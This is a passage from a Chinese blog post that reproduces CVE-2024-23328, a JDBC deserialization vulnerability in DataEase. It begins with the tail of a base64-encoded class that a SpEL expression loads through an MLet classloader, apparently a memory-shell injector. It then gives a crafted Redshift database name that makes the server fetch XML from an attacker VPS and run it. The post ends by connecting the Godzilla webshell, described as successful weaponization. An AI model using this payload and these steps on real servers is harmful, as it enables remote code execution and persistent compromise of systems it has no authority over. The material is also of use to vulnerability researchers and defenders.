YQIAaf/0KcADBkGKyy2AKk6Baf/qToHGQa2ASE6Bqf/nRkFxwAMuwCGWSu3AT+/GQUEtgCvKsEAXZkAGhkFAS22ALewOge7AUFZGQe2AUS3AUW/GQUqLbYAt7A6B7sBQVkZB7YBRLcBRb8AAwAlAHIAdQCGAJwAowCkAIgAswC6ALsAiAADAAgAAABuABsAAACPABQAkAAXAJIAGwCTACUAlQApAJcAMACYADsAmQBWAJoAXQCbAGAAmABmAJ4AaQCfAHIAowB1AKEAdwCiAH4AowCBAKUAhgCmAI8AqACVAKkAnACrAKQArACmAK0AswCxALsAsgC9ALMACQAAAHoADAAzADMBJQDnAAgAMAA2ASYBJwAHAHcABwCRASgABwCmAA0AkQEpAAcAvQANAJEBKQAHAAAAygEPAB8AAAAAAMoBJADMAAEAAADKASoBKwACAAAAygEsAS0AAwAUALYAjwCQAAQAFwCzAS4AjgAFABsArwEvAJAABgA7AAAALwAODkMHAF3+AAgHAF0HAKsHAF39ABcHATABLPkABQIIQgcAhgsNVAcAiA5HBwCIABIAAAAIAAMAhgCEAIgAAA=='),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).newInstance()}

image

xml文件放在vps上,然后进行请求

此时在后台,需要新建一个AWS Redshift数据源

image

数据库名称是

1
test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://vps/1.xml

其他都是随便填

点击获取Schema

image

vps收到服务器的请求,也就是请求xml文件

image

打开哥斯拉,配置好密码密钥选择好加载器后,需要继续配置请求头。并添加认证的凭证,也就是Authorization

image

点击测试,连接成功。

image

成功武器化利用

image

参考

由CVE-2022-21724引申jdbc漏洞
CVE-2024-23328 DataEase jdbc反序列化漏洞分析
mysql-fake-serve
java-memshell-generator

Author: jdr
Link: https://jdr2021.github.io/2024/07/14/CVE-2024-23328-DataEase-jdbc反序列化漏洞复现/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
漏洞复现